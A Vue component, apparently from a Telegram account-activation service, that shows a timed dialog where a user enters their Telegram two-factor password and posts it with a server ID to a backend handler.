<template>
  <div class="backdrop">
    <h3
      class="title"
      v-text="$t('page.generation.two_facktor_authentication.title')"
    ></h3>
    <TimerBlock class="timer_margin" :seconds="seconds" @timerFinish="timerFinish" />
    <p class="text" :class="{ 'red-color': state.isSecondTry }">
      {{ $t(state.textValue) }}
    </p>
    <div class="form">
      <form
        class="password-form"
        @submit.prevent="sendPassword"
        @keydown.enter="sendPassword"
      >
        <input
          type="password"
          id="password"
          name="password"
          class="input"
          autocomplete="off"
          v-model="passwordInput"
          :disabled="isLoading"
          :placeholder="$t('page.generation.two_facktor_authentication.input')"
        />
        <ButtonLoading
          class="btn"
          type="submit"
          :loading="isLoading"
          :disabled="isDisabled"
        >
          {{ $t("page.generation.two_facktor_authentication.btn") }}
        </ButtonLoading>
      </form>
    </div>
  </div>
</template>

<script setup>
import { ref, watch, computed } from "vue";
import { useStore } from "vuex";
import { useRouter } from "vue-router";
import { useI18n } from "vue-i18n";
import useActivationTelegram from "@/components/activation/api/useActivationTelegram";

import ButtonLoading from "@/components/Recurring/ButtonLoading.vue";
import TimerBlock from "@/components/Recurring/TimerBlockRecurring.vue";

const store = useStore();
const router = useRouter();
const { t: $t } = useI18n();

const { postTwoFactorAuth, twoFactorAuth } = useActivationTelegram();

const seconds = ref(60);
const isLoading = ref(false);
const passwordInput = ref("");
const state = computed(() => {
  const isSecondTry = !!store.state.dialogParams?.isSecondTry;
  let textValue;
  if (isSecondTry) {
    textValue = $t("page.generation.two_facktor_authentication.text2");
    isLoading.value = false;
  } else {
    textValue = $t("page.generation.two_facktor_authentication.text");
  }

  return {
    isSecondTry,
    textValue,
  };
});

const isDisabled = computed(() => !passwordInput.value.length);

// TODO: REMOVE THIS LATER
watch(
  () => twoFactorAuth.value,
  (newValue, oldValue) => {
    if (oldValue === newValue) {
      isLoading.value = true;
      store.commit("activation/SET_NEXT_STAGE_ACTIVATION", "timeOver");
      store.commit("closeDialog");
      return;
    }

    if (newValue === "Password submitted for processing") {
      // isLoading.value = false
      // clearTimeout(timeoutId)
      // store.commit("activation/SET_NEXT_STAGE_ACTIVATION", "successActivation")
      // store.commit("closeDialog");
      return;
    }

    if (newValue === "oops") {
      store.commit("activation/SET_NEXT_STAGE_ACTIVATION", "oops");
      store.commit("closeDialog");
    }
  }
);

const timerFinish = () => {
  store.commit("activation/SET_NEXT_STAGE_ACTIVATION", "timeOver");
  store.commit("closeDialog");
};
const sendPassword = async () => {
  isLoading.value = true;

  let req_data = new FormData();
  req_data.append("server_id", store.state.activation.serverId);
  req_data.append("password", passwordInput.value);

  passwordInput.value = "";
  postTwoFactorAuth(req_data);
};
</script>

<style lang="scss" scoped>
.form {
  max-width: 400px;
  width: 100%;
}

.title {
  text-align: center;
  font-family: Gilroy;
  font-size: 20px;
  font-weight: 500;
  padding: 0 30px;
  text-transform: uppercase;
  color: var(--text-color);
}

.input {
  border-radius: 11px;
  background: #e4e2f4;
  width: 100%;
  height: 50px;
  font-family: Gilroy;
  font-style: normal;
  font-weight: 500;
  font-size: 14px;
  line-height: 135.7%;
  color: rgba(0, 0, 0, 0.46);
  border: 1px solid transparent;
  padding-left: 22px;
}

.red {
  border: 1px solid red;

  &-color {
    color: red;
  }
}

.password-form {
  display: flex;
  justify-content: center;
  align-items: center;
  flex-direction: column;
}

.text {
  display: flex;
  justify-content: center;
  align-items: center;
  text-align: center;
  color: var(--text-second-color);
  max-width: 320px;
  width: 100%;
  margin-bottom: 20px;
  font-family: Gilroy;
  font-style: normal;
  font-weight: 500;
  font-size: 1rem;
  line-height: 1;
}

.backdrop {
  box-sizing: border-box;
  display: flex;
  align-items: center;
  flex-direction: column;
  padding: 26px;
  max-width: 610px;
  border-radius: 7px;
  text-align: center;
  transition: 350ms;
  z-index: 2;
  background-color: white;
}

.btn {
  margin-top: 20px;
  width: 198px;
  height: 43px;
  background: var(--general-color);
  color: white;
  border-radius: 11px;
  border: none;
  font-family: Gilroy;
  font-style: normal;
  font-weight: 600;
  font-size: 15px;
  line-height: 17px;
  text-align: center;
  text-transform: uppercase;
  cursor: pointer;
  transition: 0.25s;

  &:hover {
    background: none;
    color: var(--general-color);
    transition: 0.25s;
    border: 1px solid;
    border-color: var(--general-color);
  }
}

.timer_margin {
  margin: 20px 0;
}

@media screen and (max-width: 420px) {
  .text {
    line-height: 1.2;
  }

  .backdrop {
    gap: 0;
  }
}
</style>
